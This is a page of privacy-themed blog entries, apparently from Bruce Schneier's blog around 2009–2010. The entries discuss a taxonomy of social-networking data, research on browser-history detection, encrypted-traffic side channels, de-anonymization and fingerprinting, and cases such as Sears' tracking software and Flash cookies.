Entries Tagged "web privacy"

Page 3 of 5

A Revised Taxonomy of Social Networking Data

Lately I’ve been reading about user security and privacy — control, really — on social networking sites. The issues are hard and the solutions harder, but I’m seeing a lot of confusion in even forming the questions. Social networking sites deal with several different types of user data, and it’s essential to separate them.

Below is my taxonomy of social networking data, which I first presented at the Internet Governance Forum meeting last November, and again — revised — at an OECD workshop on the role of Internet intermediaries in June.

  • Service data is the data you give to a social networking site in order to use it. Such data might include your legal name, your age, and your credit-card number.
  • Disclosed data is what you post on your own pages: blog entries, photographs, messages, comments, and so on.
  • Entrusted data is what you post on other people’s pages. It’s basically the same stuff as disclosed data, but the difference is that you don’t have control over the data once you post it — another user does.
  • Incidental data is what other people post about you: a paragraph about you that someone else writes, a picture of you that someone else takes and posts. Again, it’s basically the same stuff as disclosed data, but the difference is that you don’t have control over it, and you didn’t create it in the first place.
  • Behavioral data is data the site collects about your habits by recording what you do and who you do it with. It might include games you play, topics you write about, news articles you access (and what that says about your political leanings), and so on.
  • Derived data is data about you that is derived from all the other data. For example, if 80 percent of your friends self-identify as gay, you’re likely gay yourself.

There are other ways to look at user data. Some of it you give to the social networking site in confidence, expecting the site to safeguard the data. Some of it you publish openly and others use it to find you. And some of it you share only within an enumerated circle of other users. At the receiving end, social networking sites can monetize all of it: generally by selling targeted advertising.

Different social networking sites give users different rights for each data type. Some are always private, some can be made private, and some are always public. Some can be edited or deleted — I know one site that allows entrusted data to be edited or deleted within a 24-hour period — and some cannot. Some can be viewed and some cannot.

It’s also clear that users should have different rights with respect to each data type. We should be allowed to export, change, and delete disclosed data, even if the social networking sites don’t want us to. It’s less clear what rights we have for entrusted data — and far less clear for incidental data. If you post pictures from a party with me in them, can I demand you remove those pictures — or at least blur out my face? (Go look up the conviction of three Google executives in Italian court over a YouTube video.) And what about behavioral data? It’s frequently a critical part of a social networking site’s business model. We often don’t mind if a site uses it to target advertisements, but are less sanguine when it sells data to third parties.

As we continue our conversations about what sorts of fundamental rights people have with respect to their data, and more countries contemplate regulation on social networking sites and user data, it will be important to keep this taxonomy in mind. The sorts of things that would be suitable for one type of data might be completely unworkable and inappropriate for another.

This essay previously appeared in IEEE Security & Privacy.

Edited to add: this post has been translated into Portuguese.

Posted on August 10, 2010 at 6:51 AMView Comments

Detecting Browser History

Interesting research.

Main results:

[…]

  • We analyzed the results from over a quarter of a million people who ran our tests in the last few months, and found that we can detect browsing histories for over 76% of them. All major browsers allow their users’ history to be detected, but it seems that users of the more modern browsers such as Safari and Chrome are more affected; we detected visited sites for 82% of Safari users and 94% of Chrome users.

    […]

  • While our tests were quite limited, for our test of 5000 most popular websites, we detected an average of 63 visited locations (13 sites and 50 subpages on those sites); the medians were 8 and 17 respectively.
  • Almost 10% of our visitors had over 30 visited sites and 120 subpages detected — heavy Internet users who don’t protect themselves are more affected than others.

    […]

  • The ability to detect visitors’ browsing history requires just a few lines of code. Armed with a list of websites to check for, a malicious webmaster can scan over 25 thousand links per second (1.5 million links per minute) in almost every recent browser.
  • Most websites and pages you view in your browser can be detected as long as they are kept in your history. Almost every address that was in your browser’s address bar can be detected (this includes most pages, including those retrieved using https and some forms with potentialy private information such as your zipcode or search query). Pages won’t be detected when they expire from your history (usually after a month or two), or if you manually clear it.

For now, the only way to fix the issue is to constantly clear browsing history or use private browsing modes. The first browser to prevent this trick in a default installation (Firefox 4.0) is supposed to come out in October.

Here’s a link to the paper.

Posted on May 20, 2010 at 1:28 PMView Comments

Side-Channel Attacks on Encrypted Web Traffic

Nice paper: “Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow,” by Shuo Chen, Rui Wang, XiaoFeng Wang, and Kehuan Zhang.

Abstract. With software-as-a-service becoming mainstream, more and more applications are delivered to the client through the Web. Unlike a desktop application, a web application is split into browser-side and server-side components. A subset of the application’s internal information flows are inevitably exposed on the network. We show that despite encryption, such a side-channel information leak is a realistic and serious threat to user privacy. Specifically, we found that surprisingly detailed sensitive information is being leaked out from a number of high-profile, top-of-the-line web applications in healthcare, taxation, investment and web search: an eavesdropper can infer the illnesses/medications/surgeries of the user, her family income and investment secrets, despite HTTPS protection; a stranger on the street can glean enterprise employees’ web search queries, despite WPA/WPA2 Wi-Fi encryption. More importantly, the root causes of the problem are some fundamental characteristics of web applications: stateful communication, low entropy input for better interaction, and significant traffic distinctions. As a result, the scope of the problem seems industry-wide. We further present a concrete analysis to demonstrate the challenges of mitigating such a threat, which points to the necessity of a disciplined engineering practice for side-channel mitigations in future web application developments.

We already know that eavesdropping on an SSL-encrypted web session can leak a lot of information about the person’s browsing habits. Since the size of both the page requests and the page downloads are different, an eavesdropper can sometimes infer which links the person clicked on and what pages he’s viewing.

This paper extends that work. Ed Felten explains:

The new paper shows that this inference-from-size problem gets much, much worse when pages are using the now-standard AJAX programming methods, in which a web “page” is really a computer program that makes frequent requests to the server for information. With more requests to the server, there are many more opportunities for an eavesdropper to make inferences about what you’re doing — to the point that common applications leak a great deal of private information.

Consider a search engine that autocompletes search queries: when you start to type a query, the search engine gives you a list of suggested queries that start with whatever characters you have typed so far. When you type the first letter of your search query, the search engine page will send that character to the server, and the server will send back a list of suggested completions. Unfortunately, the size of that suggested completion list will depend on which character you typed, so an eavesdropper can use the size of the encrypted response to deduce which letter you typed. When you type the second letter of your query, another request will go to the server, and another encrypted reply will come back, which will again have a distinctive size, allowing the eavesdropper (who already knows the first character you typed) to deduce the second character; and so on. In the end the eavesdropper will know exactly which search query you typed. This attack worked against the Google, Yahoo, and Microsoft Bing search engines.

Many web apps that handle sensitive information seem to be susceptible to similar attacks. The researchers studied a major online tax preparation site (which they don’t name) and found that it leaks a fairly accurate estimate of your Adjusted Gross Income (AGI). This happens because the exact set of questions you have to answer, and the exact data tables used in tax preparation, will vary based on your AGI. To give one example, there is a particular interaction relating to a possible student loan interest calculation, that only happens if your AGI is between $115,000 and $145,000 — so that the presence or absence of the distinctively-sized message exchange relating to that calculation tells an eavesdropper whether your AGI is between $115,000 and $145,000. By assembling a set of clues like this, an eavesdropper can get a good fix on your AGI, plus information about your family status, and so on.

For similar reasons, a major online health site leaks information about which medications you are taking, and a major investment site leaks information about your investments.

The paper goes on to talk about mitigation — padding page requests and downloads to a constant size is the obvious one — but they’re difficult and potentially expensive.

More articles.

Posted on March 26, 2010 at 6:04 AMView Comments

De-Anonymizing Social Network Users

Interesting paper: “A Practical Attack to De-Anonymize Social Network Users.”

Abstract. Social networking sites such as Facebook, LinkedIn, and Xing have been reporting exponential growth rates. These sites have millions of registered users, and they are interesting from a security and privacy point of view because they store large amounts of sensitive personal user data.

In this paper, we introduce a novel de-anonymization attack that exploits group membership information that is available on social networking sites. More precisely, we show that information about the group memberships of a user (i.e., the groups of a social network to which a user belongs) is often sufficient to uniquely identify this user, or, at least, to significantly reduce the set of possible candidates. To determine the group membership of a user, we leverage well-known web browser history stealing attacks. Thus, whenever a social network user visits a malicious website, this website can launch our de-anonymization attack and learn the identity of its visitors.

The implications of our attack are manifold, since it requires a low effort and has the potential to affect millions of social networking users. We perform both a theoretical analysis and empirical measurements to demonstrate the feasibility of our attack against Xing, a medium-sized social network with more than eight million members that is mainly used for business relationships. Our analysis suggests that about 42% of the users that use groups can be uniquely identified, while for 90%, we can reduce the candidate set to less than 2,912 persons. Furthermore, we explored other, larger social networks and performed experiments that suggest that users of Facebook and LinkedIn are equally vulnerable (although attacks would require more resources on the side of the attacker). An analysis of an additional five social networks indicates that they are also prone to our attack.

News article. Moral: anonymity is really, really hard — but we knew that already.

Posted on March 8, 2010 at 6:13 AMView Comments

Tracking your Browser Without Cookies

How unique is your browser? Can you be tracked simply by its characteristics? The EFF is trying to find out. Their site Panopticlick will measure the characteristics of your browser setup and tell you how unique it is.

I just ran the test on myself, and my browser is unique amongst the 120,000 browsers tested so far. It’s my browser plugin details; no one else has the exact configuration I do. My list of system fonts is almost unique; only one other person has the exact configuration I do. (This seems odd to me, I have a week old Sony laptop running Windows 7, and I haven’t done anything with the fonts.)

EFF has some suggestions for self-defense, none of them very satisfactory. And here’s a news story.

EDITED TO ADD (1/29): There’s a lot in the comments leading me to question the accuracy of this test. I’ll post more when I know more.

EDITED TO ADD (2/12): Comments from one of the project developers.

Posted on January 29, 2010 at 7:06 AMView Comments

Helpful Hint for Fugitives: Don't Update Your Location on Facebook

Fugitive caught after updating his status on Facebook.”

Investigators scoured social networking sites such as Facebook and MySpace but initially could find no trace of him and were unable to pin down his location in Mexico.

Several months later, a secret service agent, Seth Reeg, checked Facebook again and up popped MaxiSopo. His photo showed him partying in front of a backdrop featuring logos of BMW and Courvoisier cognac, sporting a black jacket adorned with a not-so-subtle white lion.

Although Sopo’s profile was set to private, his list of friends was not. Scoville started combing through it and was surprised to see that one friend listed an affiliation with the justice department. He sent a message requesting a phone call.

“We figured this was a person we could probably trust to keep our inquiry discreet,” Scoville said.

Proving the 2.0 adage that a friend on Facebook is rarely a friend indeed, the former official said he had met Sopo in Cancun’s nightclubs a few times, but did not really know him and had no idea he was a fugitive. The official learned where Sopo was living and passed that information back to Scoville, who provided it to Mexican authorities. They arrested Sopo last month.

It’s easy to say “so dumb,” and it would be true, but what’s interesting is how people just don’t think through the privacy implications of putting their information on the Internet. Facebook is how we interact with friends, and we think of it in the frame of interacting with friends. We don’t think that our employers might be looking — they’re not our friends! — that the information will be around forever, or that it might be abused. Privacy isn’t salient; chatting with friends is.

Posted on October 19, 2009 at 7:55 AMView Comments

Predicting Characteristics of People by the Company they Keep

Turns out “gaydar” can be automated:

Using data from the social network Facebook, they made a striking discovery: just by looking at a person’s online friends, they could predict whether the person was gay. They did this with a software program that looked at the gender and sexuality of a person’s friends and, using statistical analysis, made a prediction. The two students had no way of checking all of their predictions, but based on their own knowledge outside the Facebook world, their computer program appeared quite accurate for men, they said. People may be effectively “outing” themselves just by the virtual company they keep.

This sort of thing can be generalized:

The work has not been published in a scientific journal, but it provides a provocative warning note about privacy. Discussions of privacy often focus on how to best keep things secret, whether it is making sure online financial transactions are secure from intruders, or telling people to think twice before opening their lives too widely on blogs or online profiles. But this work shows that people may reveal information about themselves in another way, and without knowing they are making it public. Who we are can be revealed by, and even defined by, who our friends are: if all your friends are over 45, you’re probably not a teenager; if they all belong to a particular religion, it’s a decent bet that you do, too. The ability to connect with other people who have something in common is part of the power of social networks, but also a possible pitfall. If our friends reveal who we are, that challenges a conception of privacy built on the notion that there are things we tell, and things we don’t.

EDITED TO ADD (9/29): Better information from the MIT Newspaper.

Posted on September 29, 2009 at 7:13 AMView Comments

Sears Spies on its Customers

It’s not just hackers who steal financial and medical information:

Between April 2007 and January 2008, visitors to the Kmart and Sears web sites were invited to join an “online community” for which they would be paid $10 with the idea they would be helping the company learn more about their customers. It turned out they learned a lot more than participants realized or that the feds thought was reasonable.

To join the “My SHC Community,” users downloaded software that ended up grabbing some members’ prescription information, emails, bank account data and purchases on other sites.

Reminds me of the 2005 Sony rootkit, which — oddly enough — is in the news again too:

After purchasing an Anastacia CD, the plaintiff played it in his computer but his anti-virus software set off an alert saying the disc was infected with a rootkit. He went on to test the CD on three other computers. As a result, the plaintiff ended up losing valuable data.

Claiming for his losses, the plaintiff demanded 200 euros for 20 hours wasted dealing with the virus alerts and another 100 euros for 10 hours spent restoring lost data. Since the plaintiff was self-employed, he also claimed for loss of profits and in addition claimed 800 euros which he paid to a computer expert to repair his network after the infection. Added to this was 185 euros in legal costs making a total claim of around 1,500 euros.

The judge’s assessment was that the CD sold to the plaintiff was faulty, since he should be able to expect that the CD could play on his system without interfering with it.

The court ordered the retailer of the CD to pay damages of 1,200 euros.

Posted on September 24, 2009 at 6:37 AMView Comments

Flash Cookies

Flash has the equivalent of cookies, and they’re hard to delete:

Unlike traditional browser cookies, Flash cookies are relatively unknown to web users, and they are not controlled through the cookie privacy controls in a browser. That means even if a user thinks they have cleared their computer of tracking objects, they most likely have not.

What’s even sneakier?

Several services even use the surreptitious data storage to reinstate traditional cookies that a user deleted, which is called ‘re-spawning’ in homage to video games where zombies come back to life even after being “killed,” the report found. So even if a user gets rid of a website’s tracking cookie, that cookie’s unique ID will be assigned back to a new cookie again using the Flash data as the “backup.”

Posted on August 17, 2009 at 6:36 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.